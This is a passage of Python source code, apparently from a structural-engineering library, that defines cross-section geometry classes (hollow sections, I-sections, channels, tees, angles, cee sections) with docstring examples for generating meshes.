sectionproperties.pre.sections as sections\n\n geometry = sections.Ehs(d_y=25, d_x=50, t=2.0, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[0.5])\n\n .. figure:: ../images/sections/ehs_geometry.png\n :align: center\n :scale: 75 %\n\n EHS geometry.\n\n .. 
figure:: ../images/sections/ehs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d_y, d_x, t, n, shift=[0, 0]):\n \"\"\"Inits the Ehs class.\"\"\"\n\n # assign control point\n control_points = [[(d_x * 0.5) - (t * 0.5), 0]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the EHS\n self.holes = [[0, 0]]\n\n # loop through each point of the EHS\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of outer and inner points\n x_outer = 0.5 * d_x * np.cos(theta)\n y_outer = 0.5 * d_y * np.sin(theta)\n x_inner = ((0.5 * d_x) - t) * np.cos(theta)\n y_inner = ((0.5 * d_y) - t) * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x_outer, y_outer])\n self.points.append([x_inner, y_inner])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n\nclass Rhs(Geometry):\n \"\"\"Constructs a rectangular hollow section centered at *(b/2, d/2)*, with depth *d*, width *b*,\n thickness *t* and outer radius *r_out*, using *n_r* points to construct the inner and outer\n radii. If the outer radius is less than the thickness of the RHS, the inner radius is set to\n zero.\n\n :param float d: Depth of the RHS\n :param float b: Width of the RHS\n :param float t: Thickness of the RHS\n :param float r_out: Outer radius of the RHS\n :param int n_r: Number of points discretising the inner and outer radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an RHS with a depth of 100, a width of 50, a thickness of 6 and\n an outer radius of 9, using 8 points to discretise the inner and outer radii. A mesh is\n generated with a maximum triangular area of 2.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Rhs(d=100, b=50, t=6, r_out=9, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/rhs_geometry.png\n :align: center\n :scale: 75 %\n\n RHS geometry.\n\n .. 
figure:: ../images/sections/rhs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the Rhs class.\"\"\"\n\n # assign control point\n control_points = [[b - t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the RHS\n self.holes = [[b * 0.5, d * 0.5]]\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer radius points\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n self.draw_radius([b - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n self.draw_radius([b - r_out, d - r_out], r_out, 0, n_r)\n self.draw_radius([r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n # construct the outer radius facet list\n n_outer = len(self.points)\n for i in range(n_outer):\n # if we are not at the last point\n if i != n_outer - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i, 0])\n\n # construct the inner radius points\n self.draw_radius([t + r_in, t + r_in], r_in, np.pi, n_r)\n self.draw_radius([b - t - r_in, t + r_in], r_in, 1.5 * np.pi, n_r)\n self.draw_radius([b - t - r_in, d - t - r_in], r_in, 0, n_r)\n self.draw_radius([t + r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r)\n\n # construct the inner radius facet list\n n_inner = len(self.points) - n_outer\n for i in range(n_inner):\n # if we are not at the last point\n if i != n_inner - 1:\n self.facets.append([i + n_outer, i + n_outer + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i + n_outer, n_outer])\n\n self.perimeter = list(range(int(len(self.facets) / 2)))\n\n self.shift_section()\n\n\nclass ISection(Geometry):\n \"\"\"Constructs an I-section centered at *(b/2, d/2)*, with depth *d*, width *b*, flange\n thickness *t_f*, web thickness *t_w*, and root radius *r*, using *n_r* points to construct the\n root radius.\n\n :param float d: Depth of the I-section\n :param float b: Width of the I-section\n :param float t_f: Flange thickness of the I-section\n :param float t_w: Web thickness of the I-section\n :param float r: Root radius of the I-section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an I-section with a depth of 203, a width of 133, a flange\n thickness of 7.8, a web thickness of 5.8 and a root radius of 8.9, using 16 points to\n discretise the root radius. A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/isection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. 
figure:: ../images/sections/isection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first three points\n self.points.append([0, 0])\n self.points.append([b, 0])\n self.points.append([b, t_f])\n\n # construct the bottom right radius\n pt = [b * 0.5 + t_w * 0.5 + r, t_f + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [b * 0.5 + t_w * 0.5 + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next four points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n self.points.append([0, d - t_f])\n\n # construct the top left radius\n pt = [b * 0.5 - t_w * 0.5 - r, d - t_f - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # construct the bottom left radius\n pt = [b * 0.5 - t_w * 0.5 - r, t_f + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the last point\n self.points.append([0, t_f])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass MonoISection(Geometry):\n \"\"\"Constructs a monosymmetric I-section centered at *(max(b_t, b_b)/2, d/2)*, with depth *d*,\n top flange width *b_t*, bottom flange width *b_b*, top flange thickness *t_ft*, top flange\n thickness *t_fb*, web thickness *t_w*, and root radius *r*, using *n_r* points to construct the\n root radius.\n\n :param float d: Depth of the I-section\n :param float b_t: Top flange width\n :param float b_b: Bottom flange width\n :param float t_ft: Top flange thickness of the I-section\n :param float t_fb: Bottom flange thickness of the I-section\n :param float t_w: Web thickness of the I-section\n :param float r: Root radius of the I-section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a monosymmetric I-section with a depth of 200, a top flange width\n of 50, a top flange thickness of 12, a bottom flange width of 130, a bottom flange thickness of\n 8, a web thickness of 6 and a root radius of 8, using 16 points to discretise the root radius.\n A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.MonoISection(\n d=200, b_t=50, b_b=130, t_ft=12, t_fb=8, t_w=6, r=8, n_r=16\n )\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/monoisection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. 
figure:: ../images/sections/monoisection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b_t, b_b, t_fb, t_ft, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[max(b_t, b_b) * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate central axis\n x_central = max(b_t, b_b) * 0.5\n\n # add first three points\n self.points.append([x_central - b_b * 0.5, 0])\n self.points.append([x_central + b_b * 0.5, 0])\n self.points.append([x_central + b_b * 0.5, t_fb])\n\n # construct the bottom right radius\n pt = [x_central + t_w * 0.5 + r, t_fb + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [x_central + t_w * 0.5 + r, d - t_ft - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next four points\n self.points.append([x_central + b_t * 0.5, d - t_ft])\n self.points.append([x_central + b_t * 0.5, d])\n self.points.append([x_central - b_t * 0.5, d])\n self.points.append([x_central - b_t * 0.5, d - t_ft])\n\n # construct the top left radius\n pt = [x_central - t_w * 0.5 - r, d - t_ft - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # construct the bottom left radius\n pt = [x_central - t_w * 0.5 - r, t_fb + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the last point\n self.points.append([x_central - b_b * 0.5, t_fb])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TaperedFlangeISection(Geometry):\n \"\"\"Constructs a Tapered Flange I-section centered at *(b/2, d/2)*, with depth *d*, width *b*,\n mid-flange thickness *t_f*, web thickness *t_w*, root radius *r_r*, flange radius *r_f* and\n flange angle *alpha*, using *n_r* points to construct the radii.\n\n :param float d: Depth of the Tapered Flange I-section\n :param float b: Width of the Tapered Flange I-section\n :param float t_f: Mid-flange thickness of the Tapered Flange I-section (measured at the point\n equidistant from the face of the web to the edge of the flange)\n :param float t_w: Web thickness of the Tapered Flange I-section\n :param float r_r: Root radius of the Tapered Flange I-section\n :param float r_f: Flange radius of the Tapered Flange I-section\n :param float alpha: Flange angle of the Tapered Flange I-section (degrees)\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tapered Flange I-section with a depth of 588, a width of 191, a\n mid-flange thickness of 27.2, a web thickness of 15.2, a root radius of 17.8, a flange radius\n of 8.9 and a flange angle of 8°, using 16 points to discretise the radii. A mesh is generated\n with a maximum triangular area of 20.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TaperedFlangeISection(\n d=588, b=191, t_f=27.2, t_w=15.2, r_r=17.8, r_f=8.9, alpha=8, n_r=16\n )\n mesh = geometry.create_mesh(mesh_sizes=[20.0])\n\n .. figure:: ../images/sections/taperedisection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. 
figure:: ../images/sections/taperedisection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r_r, r_f, alpha, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate alpha in radians\n alpha_rad = np.pi * alpha / 180\n\n # calculate the height of the flange toe and dimensions of the straight\n x1 = b * 0.25 - t_w * 0.25 - r_f * (1 - np.sin(alpha_rad))\n y1 = x1 * np.tan(alpha_rad)\n x2 = b * 0.25 - t_w * 0.25 - r_r * (1 - np.sin(alpha_rad))\n y2 = x2 * np.tan(alpha_rad)\n y_t = t_f - y1 - r_f * np.cos(alpha_rad)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom right flange toe radius\n if r_f == 0:\n self.points.append([b, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom right root radius\n if r_r == 0:\n self.points.append([b * 0.5 + t_w * 0.5, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 / 2 * np.pi - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = b * 0.5 + t_w * 0.5 + r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right root radius\n if r_r == 0:\n self.points.append([b * 0.5 + t_w * 0.5, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi - i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b * 0.5 + t_w * 0.5 + r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right flange toe radius\n if r_f == 0:\n self.points.append([b, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 * np.pi / 2 + alpha_rad) + i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad\n )\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # add the next two points\n self.points.append([b, d])\n self.points.append([0, d])\n\n # construct the top left flange toe radius\n if r_f == 0:\n self.points.append([0, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi + (i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad))\n\n # calculate the locations of the radius points\n x = r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top left root radius\n if r_r == 0:\n self.points.append([b * 0.5 - t_w * 0.5, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n np.pi * 0.5 - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius 
points\n x = b * 0.5 - t_w * 0.5 - r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom left root radius\n if r_r == 0:\n self.points.append([b * 0.5 - t_w * 0.5, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = -i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b * 0.5 - t_w * 0.5 - r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom left flange toe radius\n if r_f == 0:\n self.points.append([0, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n np.pi * 0.5 + alpha_rad) + (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass PfcSection(Geometry):\n \"\"\"Constructs a PFC section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n width *b*, flange thickness *t_f*, web thickness *t_w* and root radius *r*, using *n_r* points\n to construct the root radius.\n\n :param float d: Depth of the PFC section\n :param float b: Width of the PFC section\n :param float t_f: Flange thickness of the PFC section\n :param float t_w: Web thickness of the PFC section\n :param float r: Root radius of the PFC section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a PFC section with a depth of 250, a width of 90, a flange\n thickness of 15, a web thickness of 8 and a root radius of 12, using 8 points to discretise the\n root radius. A mesh is generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PfcSection(d=250, b=90, t_f=15, t_w=8, r=12, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[5.0])\n\n .. figure:: ../images/sections/pfc_geometry.png\n :align: center\n :scale: 75 %\n\n PFC geometry.\n\n .. 
figure:: ../images/sections/pfc_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the PfcSection class.\"\"\"\n\n # assign control point\n control_points = [[t_w * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first three points\n self.points.append([0, 0])\n self.points.append([b, 0])\n self.points.append([b, t_f])\n\n # construct the bottom right radius\n pt = [t_w + r, t_f + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [t_w + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add last three points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TaperedFlangeChannel(Geometry):\n \"\"\"Constructs a Tapered Flange Channel section with the bottom left corner at the origin\n *(0, 0)*, with depth *d*, width *b*, mid-flange thickness *t_f*, web thickness *t_w*, root\n radius *r_r*, flange radius *r_f* and flange angle *alpha*, using *n_r* points to construct the\n radii.\n\n :param float d: Depth of the Tapered Flange Channel section\n :param float b: Width of the Tapered Flange Channel section\n :param float t_f: Mid-flange thickness of the Tapered Flange Channel section (measured at the\n point equidistant from the face of the web to the edge of the flange)\n :param float t_w: Web thickness of the Tapered Flange Channel section\n :param float r_r: Root radius of the Tapered Flange Channel section\n :param float r_f: Flange radius of the Tapered Flange Channel section\n :param float alpha: Flange angle of the Tapered Flange Channel section (degrees)\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tapered Flange Channel section with a depth of 10, a width of\n 3.5, a mid-flange thickness of 0.575, a web thickness of 0.475, a root radius of 0.575, a\n flange radius of 0.4 and a flange angle of 8°, using 16 points to discretise the radii. A mesh\n is generated with a maximum triangular area of 0.02::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TaperedFlangeChannel(\n d=10, b=3.5, t_f=0.575, t_w=0.475, r_r=0.575, r_f=0.4, alpha=8, n_r=16\n )\n mesh = geometry.create_mesh(mesh_sizes=[0.02])\n\n .. figure:: ../images/sections/taperedchannel_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. 
figure:: ../images/sections/taperedchannel_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r_r, r_f, alpha, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[t_w * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate alpha in radians\n alpha_rad = np.pi * alpha / 180\n\n # calculate the height of the flange toe and dimensions of the straight\n x1 = b * 0.5 - t_w * 0.5 - r_f * (1 - np.sin(alpha_rad))\n y1 = x1 * np.tan(alpha_rad)\n x2 = b * 0.5 - t_w * 0.5 - r_r * (1 - np.sin(alpha_rad))\n y2 = x2 * np.tan(alpha_rad)\n y_t = t_f - y1 - r_f * np.cos(alpha_rad)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom right flange toe radius\n if r_f == 0:\n self.points.append([b, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom right root radius\n if r_r == 0:\n self.points.append([t_w, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 / 2 * np.pi - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = t_w + r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right root radius\n if r_r == 0:\n self.points.append([t_w, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi - i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = t_w + r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(\n theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right flange toe radius\n if r_f == 0:\n self.points.append([b, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 * np.pi / 2 + alpha_rad) + (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # add the final two points\n self.points.append([b, d])\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TeeSection(Geometry):\n \"\"\"Constructs a Tee section with the top left corner at *(0, d)*, with depth *d*, width *b*,\n flange thickness *t_f*, web thickness *t_w* and root radius *r*, using *n_r* points to\n construct the root radius.\n\n :param float d: Depth of the Tee section\n :param float b: Width of the Tee section\n :param float t_f: Flange thickness of the Tee section\n :param float t_w: Web thickness of the Tee section\n :param float 
r: Root radius of the Tee section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tee section with a depth of 200, a width of 100, a flange\n thickness of 12, a web thickness of 6 and a root radius of 8, using 8 points to discretise the\n root radius. A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TeeSection(d=200, b=100, t_f=12, t_w=6, r=8, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/tee_geometry.png\n :align: center\n :scale: 75 %\n\n Tee section geometry.\n\n .. figure:: ../images/sections/tee_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the TeeSection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d - t_f * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([b * 0.5 - t_w * 0.5, 0])\n self.points.append([b * 0.5 + t_w * 0.5, 0])\n\n # construct the top right radius\n pt = [b * 0.5 + t_w * 0.5 + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add next four points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n self.points.append([0, d - t_f])\n\n # construct the top left radius\n pt = [b * 0.5 - t_w * 0.5 - r, d - t_f - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass AngleSection(Geometry):\n \"\"\"Constructs an angle section with the bottom left corner at the origin *(0, 0)*, with depth\n *d*, width *b*, thickness *t*, root radius *r_r* and toe radius *r_t*, using *n_r* points to\n construct the radii.\n\n :param float d: Depth of the angle section\n :param float b: Width of the angle section\n :param float t: Thickness of the angle section\n :param float r_r: Root radius of the angle section\n :param float r_t: Toe radius of the angle section\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an angle section with a depth of 150, a width of 100, a thickness\n of 8, a root radius of 12 and a toe radius of 5, using 16 points to discretise the radii. A\n mesh is generated with a maximum triangular area of 2.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.AngleSection(d=150, b=100, t=8, r_r=12, r_t=5, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/angle_geometry.png\n :align: center\n :scale: 75 %\n\n Angle section geometry.\n\n .. 
figure:: ../images/sections/angle_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, t, r_r, r_t, n_r, shift=[0, 0]):\n \"\"\"Inits the AngleSection class.\"\"\"\n\n # assign control point\n control_points = [[t * 0.5, t * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom toe radius\n pt = [b - r_t, t - r_t]\n self.draw_radius(pt, r_t, 0, n_r)\n\n # construct the root radius\n pt = [t + r_r, t + r_r]\n self.draw_radius(pt, r_r, 1.5 * np.pi, n_r, False)\n\n # construct the top toe radius\n pt = [t - r_t, d - r_t]\n self.draw_radius(pt, r_t, 0, n_r)\n\n # add the next point\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CeeSection(Geometry):\n \"\"\"Constructs a Cee section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n width *b*, lip *l*, thickness *t* and outer radius *r_out*, using *n_r* points to construct the\n radius. If the outer radius is less than the thickness of the Cee Section, the inner radius is\n set to zero.\n\n :param float d: Depth of the Cee section\n :param float b: Width of the Cee section\n :param float l: Lip of the Cee section\n :param float t: Thickness of the Cee section\n :param float r_out: Outer radius of the Cee section\n :param int n_r: Number of points discretising the outer radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :raises Exception: Lip length must be greater than the outer radius\n\n The following example creates a Cee section with a depth of 125, a width of 50, a lip of 30, a\n thickness of 1.5 and an outer radius of 6, using 8 points to discretise the radius. A mesh is\n generated with a maximum triangular area of 0.25::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CeeSection(d=125, b=50, l=30, t=1.5, r_out=6, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[0.25])\n\n .. figure:: ../images/sections/cee_geometry.png\n :align: center\n :scale: 75 %\n\n Cee section geometry.\n\n .. 
figure:: ../images/sections/cee_mesh.png\n :align: center\n :scale: 75 %\n \"\"\"\n\n def __init__(self, d, b, l, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the CeeSection class.\"\"\"\n\n # ensure the lip length is greater than the outer radius\n if l < r_out:\n raise Exception('Lip length must be greater than the outer radius')\n\n # assign control point\n control_points = [[t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer bottom left radius\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n\n # construct the outer bottom right radius\n self.draw_radius([b - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n\n if r_out != l:\n # add next two points\n self.points.append([b, l])\n self.points.append([b - t, l])\n\n # construct the inner bottom right radius\n self.draw_radius([b - t - r_in, t + r_in], r_in, 0, n_r, False)\n\n # construct the inner bottom left radius\n self.draw_radius([t + r_in, t + r_in], r_in, 1.5 * np.pi, n_r, False)\n\n # construct the inner top left radius\n self.draw_radius([t + r_in, d - t - r_in], r_in, np.pi, n_r, False)\n\n # construct the inner top right radius\n self.draw_radius(\n [b - t - r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r, False)\n\n if r_out != l:\n # add next two points\n self.points.append([b - t, d - l])\n self.points.append([b, d - l])\n\n # construct the outer top right radius\n self.draw_radius([b - r_out, d - r_out], r_out, 0, n_r)\n\n # construct the outer top left radius\n self.draw_radius([r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not 